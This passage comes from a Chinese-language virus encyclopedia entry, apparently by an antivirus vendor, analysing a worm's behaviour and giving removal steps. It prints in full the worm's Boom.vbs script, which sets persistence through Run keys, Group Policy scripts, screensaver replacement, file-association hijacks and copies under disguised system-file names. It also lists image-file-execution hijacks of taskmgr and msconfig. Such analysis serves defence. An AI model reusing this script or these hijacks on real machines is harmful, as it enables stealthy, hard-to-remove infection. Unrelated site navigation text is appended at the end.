\\Microsoft\\Windows\\System\\Scripts \\Shutdown\\0\\0\\Script 键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs" 描述：系统关闭时启动病毒脚本 HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies \\Microsoft\\Windows\\System\\Scripts \\Startup\\0\\0\\Script 键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs" 描述：系统启动时启动病毒脚本 3. 利用vbs脚本在中毒机器注销、关机、启动进行病毒文件复制及启动项的添加，Boom.vbs文件： dim fs,rg set fs = createobject("scripting.filesystemobject") set rg = createobject("wscript.shell") on error resume next rg.regwrite "HKCR\\.vbs\\", "VBSFile" rg.regwrite "HKCU\\Control Panel\\Desktop\\SCRNSAVE.EXE", " C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com" rg.regwrite "HKCU\\Control Panel\\Desktop\\ScreenSaveTimeOut", "30" rg.regwrite "HKCR\\MSCFile\\Shell\\Open\\Command\\", "C:\\WINDOWS\\pchealth\\Global.exe" rg.regwrite "HKCR\\regfile\\Shell\\Open\\Command\\", "C:\\WINDOWS\\pchealth\\Global.exe" rg.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows \\CurrentVersion\\RunOnce\\", "C:\\WINDOWS\\system32\\dllcache\\Default.exe" rg.regwrite "HKCU\\SOFTWARE\\Microsoft\\Windows \\CurrentVersion\\RunOnce\\", "C:\\WINDOWS\\system32\\dllcache\\Default.exe" rg.regwrite "HKLM\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\", "C:\\WINDOWS\\system\\KEYBOARD.exe" rg.regwrite "HKEY_CLASSES_ROOT\\MSCFile \\Shell\\Open\\Command\\", "C:\\WINDOWS\\Fonts\\Fonts.exe" rg.regwrite "HKCU\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Logoff\\0\\DisplayName", "Local Group Policy" rg.regwrite "HKCU\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Logoff\\0\\FileSysPath","" rg.regwrite "HKCU\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Logoff\\0\\GPO-ID","LocalGPO" rg.regwrite "HKCU\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Logoff\\0\\GPOName","Local Group Policy" rg.regwrite "HKCU\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Logoff\\0\\SOM-ID","Local" rg.regwrite "HKCU\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Logoff\\0\\0\\Parameters","" rg.regwrite "HKCU\\Software\\Policies\\Microsoft\\Windows\\System \\Scripts\\Logoff\\0\\0\\Script","C:\\WINDOWS\\Cursors\\Boom.vbs" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\DisplayName", "Local Group Policy" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\FileSysPath", "" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\GPO-ID", "LocalGPO" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\GPOName", "Local Group Policy" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\SOM-ID", "Local" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\0\\Parameters", "" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Shutdown\\0\\0\\Script", "C:\\WINDOWS\\Cursors\\Boom.vbs" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\DisplayName", "Local Group Policy" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\FileSysPath", "" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\GPO-ID", "LocalGPO" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\GPOName", "Local Group Policy" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\SOM-ID", "Local" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\0\\Parameters", "" rg.regwrite "HKLM\\Software\\Policies\\Microsoft \\Windows\\System\\Scripts\\Startup\\0\\0\\Script", "C:\\WINDOWS\\Cursors\\Boom.vbs" If Not fs.fileexists("C:\\WINDOWS\\Fonts\\Fonts.exe") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\WINDOWS\\Fonts\\Fonts.exe") If Not fs.fileexists("C:\\WINDOWS\\pchealth\\helpctr \\binaries\\HelpHost.com") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com") If Not fs.fileexists("C:\\WINDOWS\\pchealth\\Global.exe") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\WINDOWS\\pchealth\\Global.exe") If Not fs.fileexists("C:\\WINDOWS\\system\\KEYBOARD.exe") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\WINDOWS\\system\\KEYBOARD.exe") If Not fs.fileexists("C:\\WINDOWS\\system32\\dllcache \\Default.exe") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\WINDOWS\\system32\\dllcache\\Default.exe") If Not fs.fileexists("C:\\windows\\system32 \\drivers\\drivers.cab.exe") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\windows\\system32\\drivers\\drivers.cab.exe ") If Not fs.fileexists("C:\\windows\\media\\rndll32.pif ") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\windows\\media\\rndll32.pif") If Not fs.fileexists("C:\\windows\\fonts\\tskmgr.exe") Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"), ("C:\\windows\\fonts\\tskmgr.exe") 4. 启动方式多样化：将系统默认屏幕保护程序%System32%\\logon.scr替换成病毒文件%Windir%\\pchealth\\helpctr\\binaries\\HelpHost.com并修改屏幕保护启动时间为30s；在Logoff（注销）、Shutdown（关机）、Startup（启动）中加载病毒脚本%Windir% \\Cursors\\Boom.vbs"，达到保持病毒文件和启动项的完整；修改注册在开机运行项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows \\CurrentVersion\\Run、登陆用户运行项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows \\CurrentVersion\\RunOnce、系统文件Explorer.exe文件加载项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows \\CurrentVersion\\policies\\Explorer\\Run\\sys，添加了病毒文件的启动。 5. 双重文件隐藏方式：病毒运行后将衍生文件设置成系统隐藏文件，并修改注册表，隐藏受保护的操作系统： HKEY_CURRENT_USER\\Software\\Microsoft\\Windows \\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden设置为关；病毒文件主要以.EXE与.COM为后缀名，所以设置HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes \\comfile\everShowExt、 HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\exefile \everShowExt为关，即使启用系统受保护文件选项为开，也是看不到病毒文件原型的。 6. 伪装技术加映像劫持：该病毒将释放文件名设置成regedit.exe、svchost.exe、msconfig.exe、tskmgr.exe、HelpHost.com等来伪装成系统文件，使得用户无法分辨；劫持在运行命令（cmd.exe）中运行regedit.exe与mmc.exe运行病毒文件；映像劫持系统文件ctfmon.exe、msconfig.exe、taskmgr.exe、autorun.exe及系统辅助工具autoruns.exe、auto.exe，达到系统加载以上文件或是运行以上文件时就运行病毒。 7. 混淆视听：该病毒衍生的文件图标为文件夹图标，误导用户，使用户认为该病毒是文件夹，导致误运行病毒文件；将系统文件%system32%\\taskmgr.exe和%system32%\\rundll32.exe复制到系统备份目录%System32%\\dllcache下，并分别重命名为tskgr.exe和rndll32.pif；病毒衍生文件%Windir%\\Fonts\\tskmgr.exe、%Windir%\\Media\\rndll32.pif；以达到混淆视听的作用。 8. 保持计算机原有状态：病毒通过修改注册表，进行开机关机优化设置，使得开关机速度提升，使计算机不会因为运行多个病毒文件拖慢系统，修改如下： HKEY_CURRENT_USER\\Control Panel\\Desktop\\AutoEndTasks 新: 字符串: "1" 旧: 字符串: " HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg \\BootOptimizeFunction\\LcnEndLocation 新: 字符串: "642218" 旧: 字符串: "0" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg \\BootOptimizeFunction\\LcnStartLocation 新: 字符串: "550001" 旧: 字符串: "0" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg \\BootOptimizeFunction\\OptimizeComplete 新: 字符串: "Yes" 旧: 字符串: "No" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg \\BootOptimizeFunction\\OptimizeError 新: 字符串: " " 旧: 字符串: "Not Run" 9. 进程互锁：病毒完全运行后创建Global.exe、svchost.exe、system.exe进程，以达到进程互相保护。注： %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的位置。 %Windir% WINDODWS所在目录 %DriveLetter%　逻辑驱动器根目录 %ProgramFiles%　系统程序默认安装目录 %HomeDrive% 当前启动的系统的所在分区 %Documents and Settings% 当前用户文档根目录 %Temp% \\Documents and Settings\\当前用户\\Local Settings\\Temp %System32% 系统的 System32文件夹 Windows2000/NT中默认的安装路径是C:\\Winnt\\System32 windows95/98/me中默认的安装路径是C:\\Windows\\System windowsXP中默认的安装路径是C:\\Windows\\System32 清除方案 1、使用安天防线可彻底清除此病毒(推荐)，安天防线下载地址：http://www.antiyfx.com/download.htm 2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。推荐使用ATool（安天安全管理工具），ATool下载地址：http://www.antiy.com/freetools/atool.htm (1)使用安天防线或ATool中的“进程管理”关闭病毒进程：强行结束为以下路径的进程： %System32%\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\ Global.exe %System32%\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\svchost.exe %System32%\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\system.exe (2)强行删除病毒文件： %DriveLetter%\\autorun.inf %Temp%\\~DF7634.tmp %Temp%\\~DF8840.tmp %Temp%\\~DF9A47.tmp %DriveLetter%\\MS-DOS.com %Windir%\\Cursors\\Boom.vbs %Windir%\\Fonts\\Fonts.exe %Windir%\\Fonts\\tskmgr.exe %Windir%\\Media\\rndll32.pif %Windir%\\pchealth\\Global.exe %Windir%\\pchealth\\helpctr\\binaries\\HelpHost.com %Windir%\\system\\KEYBOARD.exe %System32%\\dllcache\\autorun.inf %System32%\\dllcache\\Default.exe %System32%\\dllcache\\Global.exe %System32%\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\Global.exe %System32%\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\svchost.exe %System32%\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\system.exe %System32%\\dllcache\\rndll32.exe %System32%\\dllcache\\svchost.exe %System32%\\dllcache\\tskmgr.exe %System32%\\drivers\\drivers.cab.exe %System32%\\regedit.exe (3)恢复病毒修改的注册表项目，删除病毒添加的注册表项： HKEY_CURRENT_USER\\Control Panel\\Desktop\\SCRNSAVE.EXE 新: 字符串: "C:\\WINDOWS\\pchealth \\helpctr\\binaries\\HelpHost.com" 旧: 字符串: "C:\\WINDOWS\\system32\\logon.scr" 描述：设置屏幕保护为病毒文件 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\CurrentVersion\\Explorer \\Advanced\\ShowSuperHidden 新: DWORD: 0 (0) 旧: DWORD: 1 (0x1) 描述：修改文件夹不可见隐藏文件 HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes \\MSCFile\\Shell\\Open\\Command\\@ 新: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe" 旧: 字符串： %SystemRoot%\\system32\\mmc.exe "%1" 描述：修改在运行命令中输入mmc.exe时候运行病毒 HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes \\regfile\\shell\\open\\command\\@ 新: 字符串: "C:\\WINDOWS\\pchealth\\Global.exe" 旧: 字符串: "regedit.exe "%1"" 描述：修改在运行命令中输入regedit.exe时候运行病毒 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\CurrentVersion\\RunOnce\\@ 键值: 字符串: "C:\\WINDOWS\\system32 \\dllcache\\Default.exe" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\ShellNoRoam\\MUICache \\C:\\WINDOWS\\system32\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E} \\Global.exe 键值: 字符串: "Global" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\ShellNoRoam\\MUICache \\C:\\WINDOWS\\system32\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E} \\svchost.exe 键值: 字符串: "svchost" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\ShellNoRoam\\MUICache \\C:\\WINDOWS\\system32\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E} \\system.exe 键值: 字符串: "system" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Policies \\Microsoft\\Windows\\System\\Scripts \\Logoff\\0\\0\\Script 键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs" 描述：系统注销时启动病毒脚本 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options\\auto.exe \\Debugger 键值: 字符串: "C:\\WINDOWS\\system32 \\drivers\\drivers.cab.exe" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options\\boot.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\Fonts\\fonts.exe" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options \\msconfig.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\Media\\rndll32.pif" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options \\procexp.exe\\Debugger 描述：添加映像劫持项键值: 字符串: "C:\\WINDOWS\\pchealth \\helpctr\\binaries\\HelpHost.com" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options \\taskmgr.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\Fonts\\tskmgr.exe" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\policies \\Explorer\\Run\\sys 键值: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe" 描述：添加启动项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\@ 键值: 字符串: "C:\\WINDOWS\\system\\KEYBOARD.exe" 描述：添加启动项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\RunOnce\\@ 键值: 字符串: "C:\\WINDOWS\\system32 \\dllcache\\Default.exe" 描述：添加启动项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies \\Microsoft\\Windows\\System\\Scripts \\Shutdown\\0\\0\\Script 键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs" 描述：系统关闭时启动病毒脚本 HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies \\Microsoft\\Windows\\System\\Scripts\\Startup\\0\\0\\Script 键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs" 描述：系统启动时启动病毒脚本
随便看	钜富科技（北京）有限公司钜工钜功钜公钜构钜海钜宏鞋机公司钜迹钜建大厦钜狡钜杰钜丽钜力华智能控制系统钜鳞钜灵钜鹿北宋木桌钜鹿宋器丛录钜鹿县钜鹿邑钜美钜平故城钜平遗址钜平子国钜屏钜桥

病毒标签

病毒描述

行为分析

清除方案